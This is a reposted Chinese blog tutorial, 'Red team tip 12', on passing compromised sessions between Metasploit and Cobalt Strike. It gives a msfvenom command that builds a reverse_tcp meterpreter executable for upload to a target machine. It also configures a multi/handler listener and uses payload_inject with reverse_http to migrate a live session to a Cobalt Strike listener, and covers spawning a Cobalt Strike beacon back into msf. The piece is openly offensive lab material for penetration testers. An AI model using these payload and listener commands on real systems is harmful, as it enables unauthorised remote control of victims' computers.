首页 > 其他分享 >红队技巧12:cobaltstrike和msf相互联动

红队技巧12:cobaltstrike和msf相互联动

时间:2023-12-24 22:57:10浏览次数:32  
标签:12 3254245 blog set cobaltstrike msf 红队 com

前言

我们在利用msf获取权限后有时候需要利用cobaltstrike的方便功能
在利用cobaltstrike获取到权限后有时候需要利用msf的payload
这时候就需要cobaltstrike和msf相互联动

msf会话->cobaltstrike会话

msf生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.30.131 lport=6666 -f exe > msftest.exe

msf监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.30.131
set lport 6666
run

控制靶机

然后把生成的msftest.exe上传到靶机执行,接收到会话

cobaltstrike

启动cobaltstrike,并新建一个监听(或者利用原先有的监听也可以)

##msf会话迁移到cobaltstrike

background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.30.131
set lport 1111
set DisablePayloadHandler True
set PrependMigrate True
sessions -i
set session 1
run

在cobaltstrike中上线
![](/i/l/?n=23&i=blog/3254245/202312/3254245-20231224223618199-1134553103.png)
#cobaltstrike会话->msf会话
##启动cobaltstrike并进行监听生成木马
![](/i/l/?n=23&i=blog/3254245/202312/3254245-20231224224008432-1501477976.png)
上线
![](/i/l/?n=23&i=blog/3254245/202312/3254245-20231224224111920-1077917006.png)
##cobaltstrike再添加一个监听器
![](/i/l/?n=23&i=blog/3254245/202312/3254245-20231224224219800-1260361079.png)
##msf监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lport 6667
set lhost 0.0.0.0
run

##cobaltstrike会话迁移到msf
点击这个spawn
![](/i/l/?n=23&i=blog/3254245/202312/3254245-20231224224435936-843360071.png)
![](/i/l/?n=23&i=blog/3254245/202312/3254245-20231224224455519-411615153.png)
一段时间后接受到会话
![](/i/l/?n=23&i=blog/3254245/202312/3254245-20231224224623977-748145157.png)

标签:12,3254245,blog,set,cobaltstrike,msf,红队,com
From: https://www.cnblogs.com/thebeastofwar/p/17924828.html

相关文章

  • 2023-2024-1 20231412 《计算机基础与程序设计》第13周学习总结
    2023-2024-120231412《计算机基础与程序设计》第13周学习总结作业信息这个作业属于哪个课程https://edu.cnblogs.com/campus/besti/2022-2023-1-CFAP这个作业要求在哪里https://edu.cnblogs.com/campus/besti/2023-2024-1-CFAP/homework/13010这个作业的目标《C......
  • 12.24《程序员的修炼之道》的第一章解读
    《程序员的修炼之道》的第一章主要着重介绍了作为一个优秀程序员所需要具备的基本素质和态度。以下是对第一章内容的详细解读:专业素养:作者强调了学习新技术的重要性,因为技术在不断发展,作为程序员需要不断学习和更新自己的知识。同时,保持开放的思维和态度也是重要的,要能够接受和......
  • 12月24日打卡
    今天终于完成了大型数据库技术的所有实验,感觉终于完成了,比较轻松对于这门课算是解放了。Flink初级编程实践 1.实验目的(1)通过实验掌握基本的Flink编程方法。(2)掌握用IntelliJIDEA工具编写Flink程序的方法。2.实验平台(1)Ubuntu18.04(或Ubuntu16.04)。(2)IntelliJIDEA。(3)Flink1......
  • 2023-12-24
    packagecom.example.backendmanage.controller;importcn.hutool.core.util.IdUtil;importcn.hutool.core.util.RandomUtil;importcn.hutool.core.util.StrUtil;importcn.hutool.extra.mail.MailUtil;importcom.example.backendmanage.common.AjaxResult;importc......
  • ZROI 2023.12.24 T2
    很硬的题目!题意给出一棵\(n\)个点的树以及它以\(1\)为根时的一种DFS序,\(q\)组询问(强制在线):给定\(k\)个区间\([l_1,r_1],[l_2,r_2]\dots[l_k,r_k]\),问DFS序在这些区间内的点构成几个连通块。80分解法对\(k\)根号分治,\(k>\sqrt{n}\)直接暴力,\(k\le\sqrt{n}\)的......
  • 闲话12.24
    在学校的第一天。上午下午卷了昨天讲的《数论》,感觉收获很多啊,抽象的计数题也见了一大堆......
  • 12.24
     各位同学可根据自身情况进行选择:    选项一:根据实验一、二、三完成如下任务:        任务一:基于Jfinal构建信息管理系统,要求包含用户管理,翻译业务模块管理,图片优化模块管理(占30%)。        任务二:要求不同用户登录后可进行文字翻译和图片优化业务处理,并且......
  • 2023.12.24——每日总结
    学习所花时间(包括上课):9h代码量(行):0行博客量(篇):1篇今天,上午学习,下午学习;我了解到的知识点:1.软件案例分析明日计划:学习......
  • 2023-2024-1 20231312 《计算机基础与程序设计》第13周学习总结
    作业信息这个作业属于哪个课程<班级的链接>2023-2024-1-计算机基础与程序设计|-这个作业要求在哪里<作业要求链接>2023-2024-1计算机基础与程序设计第6周作业|这个作业的目标《C语言程序设计》第12章|作业正文作业链接教材学习内容总结《C》结构体的......
  • 行业名词 - 20231224
     名词简写名词概述名词解释所属行业RPCremoteproceducecall远程通信回调技术-协议gRPCgoogleremoteproceducecallgoogle远程通信回调技术-协议ACLaccesscontrollist访问控制列表              ......